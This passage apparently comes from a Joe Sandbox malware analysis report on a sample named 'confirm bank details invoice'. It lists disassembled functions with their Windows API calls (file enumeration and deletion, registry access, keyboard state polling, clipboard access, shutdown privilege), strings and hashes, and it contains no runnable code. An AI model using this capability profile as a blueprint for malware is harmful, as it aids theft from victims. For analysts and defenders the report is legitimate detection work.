                    • Opcode ID: 72dbf59e0b533daf19bc6a78b7c91f6aab5006030d2ac8ec378c3a4c5f593f6f
                    • Instruction ID: ef86790cdf63737d79119726dc2409c8490921e6f573a43876b198a206923861
                    • Opcode Fuzzy Hash: 72dbf59e0b533daf19bc6a78b7c91f6aab5006030d2ac8ec378c3a4c5f593f6f
                    • Instruction Fuzzy Hash: 9251AF35600201ABD340EF65DC86FBE77A9AF44B05F01802EF58AD62D1DF68E805CA6A
                    Function 004BF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 004BF62B
                    • FindClose.KERNEL32(00000000), ref: 004BF67F
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004BF6A4
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004BF6BB
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 004BF6E2
                    • __swprintf.LIBCMT ref: 004BF72E
                    • __swprintf.LIBCMT ref: 004BF767
                    • __swprintf.LIBCMT ref: 004BF7BB
                      • Part of subcall function 0049172B: __woutput_l.LIBCMT ref: 00491784
                    • __swprintf.LIBCMT ref: 004BF809
                    • __swprintf.LIBCMT ref: 004BF858
                    • __swprintf.LIBCMT ref: 004BF8A7
                    • __swprintf.LIBCMT ref: 004BF8F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                    • API String ID: 835046349-2428617273
                    • Opcode ID: 4d12f15da427866f8ec4bd2090564447b5a966a759a3ec4b7412b5763ddf007d
                    • Instruction ID: e337e689b7c0fe3b67b3e0e81086ce82e0f1b3b52d132cfcd6297eeff68354e5
                    • Opcode Fuzzy Hash: 4d12f15da427866f8ec4bd2090564447b5a966a759a3ec4b7412b5763ddf007d
                    • Instruction Fuzzy Hash: B1A10EB2508344ABC310EB95CD85DAFB7ECAF99704F404C2EF59982152EB38D949C766
                    Function 004C1B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 004C1B50
                    • _wcscmp.LIBCMT ref: 004C1B65
                    • _wcscmp.LIBCMT ref: 004C1B7C
                    • GetFileAttributesW.KERNEL32(?), ref: 004C1B8E
                    • SetFileAttributesW.KERNEL32(?,?), ref: 004C1BA8
                    • FindNextFileW.KERNEL32(00000000,?), ref: 004C1BC0
                    • FindClose.KERNEL32(00000000), ref: 004C1BCB
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 004C1BE7
                    • _wcscmp.LIBCMT ref: 004C1C0E
                    • _wcscmp.LIBCMT ref: 004C1C25
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004C1C37
                    • SetCurrentDirectoryW.KERNEL32(005239FC), ref: 004C1C55
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004C1C5F
                    • FindClose.KERNEL32(00000000), ref: 004C1C6C
                    • FindClose.KERNEL32(00000000), ref: 004C1C7C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                    • String ID: *.*
                    • API String ID: 1803514871-438819550
                    • Opcode ID: b686f516be8bfd5a13506249d456de49f9ce2de0bf90fbd10ba3ee06b6b52cfb
                    • Instruction ID: a9af9e856c879b5e366cc5d894b8d84d047341a107cbbb1c04f470f4c0d92b59
                    • Opcode Fuzzy Hash: b686f516be8bfd5a13506249d456de49f9ce2de0bf90fbd10ba3ee06b6b52cfb
                    • Instruction Fuzzy Hash: 5531A735A002197ADF549FA09C49FEE77ADAF07324F10016AF811D21A1EB78DE55CA68
                    Function 004C1C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 004C1CAB
                    • _wcscmp.LIBCMT ref: 004C1CC0
                    • _wcscmp.LIBCMT ref: 004C1CD7
                      • Part of subcall function 004B6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004B6BEF
                    • FindNextFileW.KERNEL32(00000000,?), ref: 004C1D06
                    • FindClose.KERNEL32(00000000), ref: 004C1D11
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 004C1D2D
                    • _wcscmp.LIBCMT ref: 004C1D54
                    • _wcscmp.LIBCMT ref: 004C1D6B
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004C1D7D
                    • SetCurrentDirectoryW.KERNEL32(005239FC), ref: 004C1D9B
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004C1DA5
                    • FindClose.KERNEL32(00000000), ref: 004C1DB2
                    • FindClose.KERNEL32(00000000), ref: 004C1DC2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                    • String ID: *.*
                    • API String ID: 1824444939-438819550
                    • Opcode ID: 2a166284590e3e27516f330a52c57249995a23e23c203f1e04e6e8fdf13c432a
                    • Instruction ID: dbc147fbead5a2517643f27527cdf4554ba47d1df16aa5a6935a5c3380a9e5e2
                    • Opcode Fuzzy Hash: 2a166284590e3e27516f330a52c57249995a23e23c203f1e04e6e8fdf13c432a
                    • Instruction Fuzzy Hash: F6311A3690021A7ACF50AFA0DC48FEF37AD9F07324F10056AF801A21A1DB38DA55CA68
                    Function 00477D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _memset
                    • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                    • API String ID: 2102423945-2023335898
                    • Opcode ID: f1c9417863603d446217a143b6c80a63ca217e1cfc9363d2bafddb4191a0c18b
                    • Instruction ID: 529fa4e78d347336149de6375fb9d148b068bf11000bcaeaecf275f5b866662a
                    • Opcode Fuzzy Hash: f1c9417863603d446217a143b6c80a63ca217e1cfc9363d2bafddb4191a0c18b
                    • Instruction Fuzzy Hash: 8482D071D04259DFCB24CF99C8806EEBBB1BF44314F25816BD819AB341E778AD85CB89
                    Function 004C091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                    Download Yara Rule
                    APIs
                    • GetLocalTime.KERNEL32(?), ref: 004C09DF
                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 004C09EF
                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004C09FB
                    • __wsplitpath.LIBCMT ref: 004C0A59
                    • _wcscat.LIBCMT ref: 004C0A71
                    • _wcscat.LIBCMT ref: 004C0A83
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004C0A98
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004C0AAC
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004C0ADE
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004C0AFF
                    • _wcscpy.LIBCMT ref: 004C0B0B
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 004C0B4A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                    • String ID: *.*
                    • API String ID: 3566783562-438819550
                    • Opcode ID: 729f6e8e691c9628a8c9578464fe513047448077fe016ae65d3cd689d4319d91
                    • Instruction ID: e4f8a973c78a791e3c16ba33afce981d291711c43c4f2e3d46d4232933feee47
                    • Opcode Fuzzy Hash: 729f6e8e691c9628a8c9578464fe513047448077fe016ae65d3cd689d4319d91
                    • Instruction Fuzzy Hash: B6615B765043059FD710EF61C840EAEB3E8FF89314F04896EF98987252DB39E945CB9A
                    Function 004AA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004AABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004AABD7
                      • Part of subcall function 004AABBB: GetLastError.KERNEL32(?,004AA69F,?,?,?), ref: 004AABE1
                      • Part of subcall function 004AABBB: GetProcessHeap.KERNEL32(00000008,?,?,004AA69F,?,?,?), ref: 004AABF0
                      • Part of subcall function 004AABBB: HeapAlloc.KERNEL32(00000000,?,004AA69F,?,?,?), ref: 004AABF7
                      • Part of subcall function 004AABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004AAC0E
                      • Part of subcall function 004AAC56: GetProcessHeap.KERNEL32(00000008,004AA6B5,00000000,00000000,?,004AA6B5,?), ref: 004AAC62
                      • Part of subcall function 004AAC56: HeapAlloc.KERNEL32(00000000,?,004AA6B5,?), ref: 004AAC69
                      • Part of subcall function 004AAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004AA6B5,?), ref: 004AAC7A
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004AA6D0
                    • _memset.LIBCMT ref: 004AA6E5
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004AA704
                    • GetLengthSid.ADVAPI32(?), ref: 004AA715
                    • GetAce.ADVAPI32(?,00000000,?), ref: 004AA752
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004AA76E
                    • GetLengthSid.ADVAPI32(?), ref: 004AA78B
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004AA79A
                    • HeapAlloc.KERNEL32(00000000), ref: 004AA7A1
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004AA7C2
                    • CopySid.ADVAPI32(00000000), ref: 004AA7C9
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004AA7FA
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004AA820
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004AA834
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    • Opcode ID: 29dcb6a6b46739254a48c445db1bae4d90ab88c9ce63e27e30a137856bd25cba
                    • Instruction ID: c71ded860d635cd1c9e739398f869b37dd178ca942fd77a519a793a43244b4e2
                    • Opcode Fuzzy Hash: 29dcb6a6b46739254a48c445db1bae4d90ab88c9ce63e27e30a137856bd25cba
                    • Instruction Fuzzy Hash: E5513C71900209AFDF109F95DC44AEFBBB9FF15304F04812AE911AA290DB38DA25CB69
                    Function 00476F07 Relevance: 20.9, Strings: 16, Instructions: 883COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID: Q$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$QQQ Q
                    • API String ID: 0-2637990437
                    • Opcode ID: 59e96b4cfb0bb440bc32e654d6dd6d0d91bcf7a6c5d530ddb81789fd86da471b
                    • Instruction ID: 2fa4dde25cce456bb151f07693165136e742ce661626d2e1a2fd5c8404dc9e46
                    • Opcode Fuzzy Hash: 59e96b4cfb0bb440bc32e654d6dd6d0d91bcf7a6c5d530ddb81789fd86da471b
                    • Instruction Fuzzy Hash: 42727E71E042198BDB24CF59C8407FEB7B5BF04310F64816BE919EB381DB789A41DB99
                    Function 004B63F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004B6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004B5FA6,?), ref: 004B6ED8
                      • Part of subcall function 004B72CB: GetFileAttributesW.KERNEL32(?,004B6019), ref: 004B72CC
                    • _wcscat.LIBCMT ref: 004B6441
                    • __wsplitpath.LIBCMT ref: 004B645F
                    • FindFirstFileW.KERNEL32(?,?), ref: 004B6474
                    • _wcscpy.LIBCMT ref: 004B64A3
                    • _wcscat.LIBCMT ref: 004B64B8
                    • _wcscat.LIBCMT ref: 004B64CA
                    • DeleteFileW.KERNEL32(?), ref: 004B64DA
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004B64EB
                    • FindClose.KERNEL32(00000000), ref: 004B6506
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                    • String ID: \*.*
                    • API String ID: 2643075503-1173974218
                    • Opcode ID: 7319072b7610107c25fe9a8443e82fa496927cfc362c7e8fd4687ba0e41dd1e7
                    • Instruction ID: 5f48eab5a1c7b57823ab090fa76f0d68e74be6610e477ea70ccf1bf95a78bcd0
                    • Opcode Fuzzy Hash: 7319072b7610107c25fe9a8443e82fa496927cfc362c7e8fd4687ba0e41dd1e7
                    • Instruction Fuzzy Hash: CB3152B2408384AEC721DBA488859DB7BDCAF55314F44092FF6D9C3141EA39D509C7BB
                    Function 004D31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004D3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004D2BB5,?,?), ref: 004D3C1D
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004D328E
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004D332D
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004D33C5
                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 004D3604
                    • RegCloseKey.ADVAPI32(00000000), ref: 004D3611
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                    • String ID:
                    • API String ID: 1240663315-0
                    • Opcode ID: 585ac9c09097fdb284653883e36bf2063e2b195686a1247f8c38304eaa1bae4e
                    • Instruction ID: 61b9ffa76a0afb2152c96b3ab272998e3b38bd1ae87ad7f4401912e7d47b051f
                    • Opcode Fuzzy Hash: 585ac9c09097fdb284653883e36bf2063e2b195686a1247f8c38304eaa1bae4e
                    • Instruction Fuzzy Hash: CBE14C31604200AFCB14DF29C991E6BBBE5EF89714B04886EF84AD7361DB34ED05CB56
                    Function 004B2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?), ref: 004B2B5F
                    • GetAsyncKeyState.USER32(000000A0), ref: 004B2BE0
                    • GetKeyState.USER32(000000A0), ref: 004B2BFB
                    • GetAsyncKeyState.USER32(000000A1), ref: 004B2C15
                    • GetKeyState.USER32(000000A1), ref: 004B2C2A
                    • GetAsyncKeyState.USER32(00000011), ref: 004B2C42
                    • GetKeyState.USER32(00000011), ref: 004B2C54
                    • GetAsyncKeyState.USER32(00000012), ref: 004B2C6C
                    • GetKeyState.USER32(00000012), ref: 004B2C7E
                    • GetAsyncKeyState.USER32(0000005B), ref: 004B2C96
                    • GetKeyState.USER32(0000005B), ref: 004B2CA8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: 6e3d1a52ea023eccfb183eadc1f9d5a00f3c2f618dfdb03c4edfbf78bb6ec78a
                    • Instruction ID: ca3943d46b7e7bf032388325581807cb488bf3775a30e781bb10337bbba3518a
                    • Opcode Fuzzy Hash: 6e3d1a52ea023eccfb183eadc1f9d5a00f3c2f618dfdb03c4edfbf78bb6ec78a
                    • Instruction Fuzzy Hash: 3F4163349087C969FB359B648A083FBBEB16B11344F04405BD5C6563C2DBDC99D4C7BA
                    Function 004C6D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                    • String ID:
                    • API String ID: 1737998785-0
                    • Opcode ID: 8dccb010c8be48f4506af4b2f2912a8ea2597e6594fa5e8c52b2b599cec8e91c
                    • Instruction ID: 3d011cb07573066eff146cf651aa5c2974c06ea78be2f1a84d20ecc979c3fdbd
                    • Opcode Fuzzy Hash: 8dccb010c8be48f4506af4b2f2912a8ea2597e6594fa5e8c52b2b599cec8e91c
                    • Instruction Fuzzy Hash: 2F217C356005109FEB01AF69DD49F7E77A9EF04711F01846AF90ADB2A1CB78E811CB9D
                    Function 004CC18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004A9ABF: CLSIDFromProgID.OLE32 ref: 004A9ADC
                      • Part of subcall function 004A9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 004A9AF7
                      • Part of subcall function 004A9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 004A9B05
                      • Part of subcall function 004A9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 004A9B15
                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 004CC235
                    • _memset.LIBCMT ref: 004CC242
                    • _memset.LIBCMT ref: 004CC360
                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 004CC38C
                    • CoTaskMemFree.OLE32(?), ref: 004CC397
                    Strings
                    • NULL Pointer assignment, xrefs: 004CC3E5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                    • String ID: NULL Pointer assignment
                    • API String ID: 1300414916-2785691316
                    • Opcode ID: c236a2163000131e14aa0adb8da940fcf7413436277ad7d70a61608354e528c4
                    • Instruction ID: 11129134ec4c2bbd88321beaacdf367248b920eb7b24e99ff6022c06c76233ca
                    • Opcode Fuzzy Hash: c236a2163000131e14aa0adb8da940fcf7413436277ad7d70a61608354e528c4
                    • Instruction Fuzzy Hash: 67913A75D00218ABDB10DF95DC81EEEBBB9EF08310F10812EF919A7291DB746A45CFA4
                    Function 004B79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004AB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004AB180
                      • Part of subcall function 004AB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004AB1AD
                      • Part of subcall function 004AB134: GetLastError.KERNEL32 ref: 004AB1BA
                    • ExitWindowsEx.USER32(?,00000000), ref: 004B7A0F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                    • String ID: $@$SeShutdownPrivilege
                    • API String ID: 2234035333-194228
                    • Opcode ID: 6c35aad97f0f98ce715b18ca4f512edc53bfce031554fbcb872eafa17d3be670
                    • Instruction ID: 062597c692a7f1c57635c5b3a818da8e1cd750d6caecc11841ef5ac01d7ce5c9
                    • Opcode Fuzzy Hash: 6c35aad97f0f98ce715b18ca4f512edc53bfce031554fbcb872eafa17d3be670
                    • Instruction Fuzzy Hash: 2A0147717582116BF7681678DC4ABFF72189B49380F100826FA43A21C2DA6CAE0081BD
                    Function 004C8C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                    Download Yara Rule
                    APIs
